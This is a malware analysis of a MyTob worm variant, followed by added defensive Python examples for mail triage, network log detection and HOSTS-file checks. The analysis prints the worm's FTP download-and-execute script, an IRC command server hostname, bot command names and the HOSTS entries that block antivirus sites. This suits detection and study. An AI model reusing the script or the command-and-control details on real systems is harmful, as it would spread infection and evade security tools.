This variant of MyTob is very similar to existing variants
in that it is coded using Visual C, and contains instructions
to spread to other systems using these methods -
- SMTP email
- networked systems
- LSASS exploit [MS04-011]
The virus also has the following characteristics -
- has a built-in FTP daemon with the reference name "StnyFtpd", and may serve the file "bingoo.exe" via the FTP daemon
- blocks certain AV and security websites by altering the local "HOSTS" file
The virus borrows code from W32/Mydoom - this causes
some AV scanners to identify this virus as a variant
of the W32/Mydoom family.
Loading at Windows startup
If the threat is run manually, it will copy itself to
the local system in several places -
C:\WINNT\system32\nec.exe
The virus has a file size in excess of 67,000 bytes.
The virus will register itself to load at Windows startup -
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEMS" = nec.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEMS" = nec.exe
SMTP mass-mailing routine
The virus has instructions to send a copy of itself
to contacts found in files of certain extensions. This
virus appears to have borrowed the same harvest and
exclusion routines as found in the W32/Mydoom virus
family. Email addresses are sampled from files having
these extensions -
- adb
- asp
- dbx
- htm
- php
- sht
- tbb
- wab
The captured addresses are used as targets for the
mailing routine. As with other viruses using this technique,
the virus will avoid selecting email addresses containing
certain strings, such as these -
- -._!
- -._!@
- .edu
- .gov
- .mil
- abuse
- accoun
- acketst
- admin
- anyone
- arin.
- avp
- be_loyal:
- berkeley
- borlan
- bsd
- bugs
- certific
- contact
- example
- fcnz
- feste
- fido
- foo.
- fsf.
- gnu
- gold-certs
- google
- gov.
- help
- iana
- ibm.com
- icrosof
- icrosoft
- ietf
- info
- inpris
- isc.o
- isi.e
- kernel
- linux
- listserv
- math
- mit.e
- mozilla
- mydomai
- nobody
- nodomai
- noone
- not
- nothing
- ntivi
- page
- panda
- pgp
- postmaster
- privacy
- rating
- rfc-ed
- ripe.
- root
- ruslis
- samples
- secur
- sendmail
- service
- site
- soft
- somebody
- someone
- sopho
- spm
- submit
- support
- syma
- tanford.e
- the.bat
- unix
- usenet
- utgers.ed
- webmaster
- www
- you
- your
The virus carries hard-coded message bodies and sends
email with varying body text. The possible body texts
are selected from these choices -
- Mail transaction failed. Partial message is available.
- The message contains Unicode characters and has been sent as a binary attachment.
- The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
- The original message was included as an attachment.
- Here are your banks documents.
The email attachment may have either a single or
a double extension, based on this format -
filename.%1.%2
where %1 can be any of these -
doc
txt
htm
tmp
and %2 can be any of these -
exe
scr
pif
zip
The filename can be any of these -
body
data
doc
document
file
message
readme
test
text
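The body texts and the attachment naming scheme above are fixed, which makes them usable as a mail-gateway triage rule. The following is an added example, not code from the original description: it checks an attachment name against the filename.%1.%2 pattern (base name, optional %1, mandatory %2) and checks the body for the hard-coded strings, and flags a message when both match. The sample message at the bottom is constructed for illustration.

```python
import re
from typing import Dict, List, Optional

# Body texts listed in the description as hard-coded in the worm.
KNOWN_BODIES = [
    "Mail transaction failed. Partial message is available.",
    "The message contains Unicode characters and has been sent as a binary attachment.",
    "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.",
    "The original message was included as an attachment.",
    "Here are your banks documents.",
]

# Attachment name components from the description: filename.%1.%2
BASE_NAMES = {"body", "data", "doc", "document", "file", "message", "readme", "test", "text"}
MIDDLE_EXTS = {"doc", "txt", "htm", "tmp"}   # %1, optional
FINAL_EXTS = {"exe", "scr", "pif", "zip"}    # %2, always present

# base, optional middle extension, final extension; nothing else allowed.
ATTACHMENT_RE = re.compile(
    r"^(?P<base>[a-z]+)(?:\.(?P<mid>[a-z]+))?\.(?P<final>[a-z]+)$", re.IGNORECASE
)


def attachment_matches(filename: str) -> bool:
    """True if the name fits the worm's filename.%1.%2 scheme exactly."""
    m = ATTACHMENT_RE.match(filename.strip())
    if not m:
        return False
    base = m.group("base").lower()
    mid: Optional[str] = m.group("mid")
    final = m.group("final").lower()
    if base not in BASE_NAMES or final not in FINAL_EXTS:
        return False
    # Single extension (no %1) is allowed; a %1 must come from the known set.
    return mid is None or mid.lower() in MIDDLE_EXTS


def body_matches(body: str) -> bool:
    """True if the body contains one of the hard-coded texts (whitespace-normalised)."""
    norm = " ".join(body.split())
    return any(known in norm for known in KNOWN_BODIES)


def triage(body: str, attachments: List[str]) -> Dict[str, object]:
    """Return the individual hits and an overall verdict for one message."""
    hits = [a for a in attachments if attachment_matches(a)]
    body_hit = body_matches(body)
    return {"body_hit": body_hit, "attachment_hits": hits, "suspect": body_hit and bool(hits)}


if __name__ == "__main__":
    # Constructed sample message, assumed for illustration only.
    sample_body = "The original message was included as an attachment.\n"
    sample_attachments = ["message.htm.scr", "notes.txt"]
    print(triage(sample_body, sample_attachments))
```

The regex deliberately rejects names with extra components (for example three extensions), so the rule stays tight; widen BASE_NAMES or the extension sets only on the basis of samples you have actually observed.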
Network spreading routine
The virus will first bind with a high TCP port such
as 19713. The virus will spawn a thread that functions
on this TCP port as an FTP server. The server responds
with this detail, if connected to a logon instance -
220 StnyFtpd 0wns j0
When exiting the server, it responds with this string -
221 Goodbye happy r00ting.
Next, the virus will attempt to connect with systems
on the same Class A subnet as the infected system. The
virus generates random IP addresses based on the infected
system IP address, and spans across randomly selected
Class B and Class C addresses.
For example, if the infected system has an IP address
of 192.168.29.56 [using network address translation,
or NAT], the virus may try to connect with random addresses
such as these -
- 192.168.1.71
- 192.168.113.2
- 192.168.44.50 and so on
The virus attempts to connect with the random system
using TCP port 445. If a connection can be made, the
virus uses an RPC exploit to gain access to the system.
Once access is obtained, the virus generates an FTP
script and writes it to the system with these instructions:
open %IP%
%TCP port%
user hell rulez
binary
get bingoo.exe
quit
The virus then initiates FTP.EXE locally on the compromised
system to retrieve a copy of the virus as "bingoo.exe"
from the connecting system, and executes it.
Backdoor functionality
The virus will create a thread that functions as a backdoor,
using TCP port 6667. The virus connects with the IRC
server 'xtg.g3w.org' in order to receive instructions
from a malicious user. Instructions include some of
the following -
d66
.update
.raw
.exec
.rm
.dl_exec
.dl
.quit
.su
.dcomhack
.version
.uptime
.login
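Two of the behaviours described above leave a clear footprint in connection logs: the network spreading routine fans out to many random hosts on TCP port 445 inside the infected system's Class A range, and the backdoor holds an outbound connection on TCP port 6667. The following is an added example, not code from the original description, that applies both checks to firewall-style connection records. The log line format (src=, dst=, dport= fields), the fan-out threshold of five distinct targets, and the sample lines (including the placeholder IRC server address 203.0.113.5, which stands in for the resolved address of the host named in the description) are all constructed assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address
from typing import Dict, Iterable, Iterator, List, Tuple

# Constructed sample of connection records; the field layout is assumed.
SAMPLE_LOG = """\
2005-03-01T10:00:01 src=192.168.29.56 dst=192.168.1.71 dport=445 proto=tcp
2005-03-01T10:00:01 src=192.168.29.56 dst=192.168.113.2 dport=445 proto=tcp
2005-03-01T10:00:02 src=192.168.29.56 dst=192.168.44.50 dport=445 proto=tcp
2005-03-01T10:00:02 src=192.168.29.56 dst=192.207.8.13 dport=445 proto=tcp
2005-03-01T10:00:03 src=192.168.29.56 dst=192.3.220.9 dport=445 proto=tcp
2005-03-01T10:00:03 src=192.168.29.56 dst=192.168.1.71 dport=445 proto=tcp
2005-03-01T10:00:04 src=192.168.29.56 dst=192.99.17.4 dport=445 proto=tcp
2005-03-01T10:00:05 src=192.168.29.10 dst=192.168.29.200 dport=445 proto=tcp
2005-03-01T10:00:06 src=192.168.29.56 dst=203.0.113.5 dport=6667 proto=tcp
2005-03-01T10:00:07 src=192.168.29.10 dst=198.51.100.7 dport=80 proto=tcp
"""

LOG_RE = re.compile(r"src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)")

SMB_PORT = 445          # port the spreading routine connects to
IRC_PORT = 6667         # port the backdoor thread uses
FANOUT_THRESHOLD = 5    # distinct 445 targets per source before we flag (assumed)


def parse(lines: Iterable[str]) -> Iterator[Tuple[str, str, int]]:
    """Yield (src, dst, dport) for every line that carries the three fields."""
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            yield m.group("src"), m.group("dst"), int(m.group("dport"))


def same_class_a(a: str, b: str) -> bool:
    """True when both addresses share the first octet (the description's Class A range)."""
    return ip_address(a).packed[0] == ip_address(b).packed[0]


def find_scanners(lines: Iterable[str], threshold: int = FANOUT_THRESHOLD) -> Dict[str, int]:
    """Sources contacting at least `threshold` distinct hosts on 445 within their own /8."""
    targets = defaultdict(set)
    for src, dst, dport in parse(lines):
        if dport == SMB_PORT and same_class_a(src, dst):
            targets[src].add(dst)          # a set, so repeats of one target do not inflate the count
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= threshold}


def find_irc_egress(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Distinct (src, dst) pairs with an outbound connection on the backdoor port."""
    return sorted({(src, dst) for src, dst, dport in parse(lines) if dport == IRC_PORT})


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("445 fan-out:", find_scanners(lines))
    print("6667 egress:", find_irc_egress(lines))
```

On a real network, pair the fan-out count with a time window and exclude hosts that legitimately talk SMB to many peers (backup or management servers); the 6667 check is best applied to hosts that have no business reason for IRC, which on most corporate networks is all of them.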
HOSTS modification routine
This variant alters the local "HOSTS" file
in an effort to block access to Antivirus and security
related web addresses. The virus overwrites the "HOSTS"
file with misconfigured information so that attempts
to reach certain addresses resolve to the IP 127.0.0.1,
also known as "localhost". Below is a copy
of a modified HOSTS file -
127.0.0.1 avp.com
127.0.0.1 ca.com
127.0.0.1 customer.symantec.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mast.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 nai.com
127.0.0.1 networkassociates.com
127.0.0.1 rads.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 sophos.com
127.0.0.1 symantec.com
127.0.0.1 trendmicro.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 viruslist.com
127.0.0.1 www.avp.com
127.0.0.1 www.ca.com
127.0.0.1 www.f-secure.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.mcafee.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.my-etrust.com
127.0.0.1 www.nai.com
127.0.0.1 www.networkassociates.com
127.0.0.1 www.sophos.com
127.0.0.1 www.symantec.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.viruslist.com
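Because the modified HOSTS file maps vendor update and support hosts to 127.0.0.1, a host check that parses the file and flags loopback mappings for known security domains is a simple, reliable indicator of this family of tampering. The following is an added example, not code from the original description; the vendor domain list is taken from the entries shown above (parent domains, so subdomains such as liveupdate.symantec.com match too), and the sample HOSTS content is constructed. The Windows path given in the usage comment is an assumption about where the file normally lives.

```python
from typing import Iterator, List, Tuple

# Parent domains of the hosts the description shows being redirected.
SECURITY_VENDOR_DOMAINS = {
    "avp.com", "ca.com", "symantec.com", "symantecliveupdate.com", "mcafee.com",
    "f-secure.com", "kaspersky.com", "my-etrust.com", "nai.com",
    "networkassociates.com", "sophos.com", "trendmicro.com", "viruslist.com",
    "microsoft.com",
}

LOOPBACK = {"127.0.0.1", "::1"}

# Constructed sample: a legitimate localhost line, two tampered lines,
# a comment, and an unrelated internal mapping.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1 liveupdate.symantec.com
127.0.0.1 www.mcafee.com   # trailing comment
10.0.0.5        intranet.example
"""


def parse_hosts(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (ip, hostname) for every hostname token on each non-comment line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments, including trailing ones
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue                          # malformed line, nothing to map
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower()


def is_vendor_host(hostname: str) -> bool:
    """True if hostname is one of the vendor domains or a subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in SECURITY_VENDOR_DOMAINS)


def find_blocked_vendor_entries(text: str) -> List[Tuple[str, str]]:
    """Entries that send a security vendor hostname to loopback."""
    return [
        (ip, name)
        for ip, name in parse_hosts(text)
        if ip in LOOPBACK and is_vendor_host(name)
    ]


if __name__ == "__main__":
    # Assumed default location on Windows; pass the path that applies on your system.
    # with open(r"C:\WINDOWS\system32\drivers\etc\hosts") as f:
    #     text = f.read()
    text = SAMPLE_HOSTS
    for ip, name in find_blocked_vendor_entries(text):
        print(f"tampered: {name} -> {ip}")
```

Extend SECURITY_VENDOR_DOMAINS with the vendors your organisation actually depends on, and treat any match as a reason to re-image rather than just repair the file, since the same worm has already installed a backdoor by the time the HOSTS file is altered.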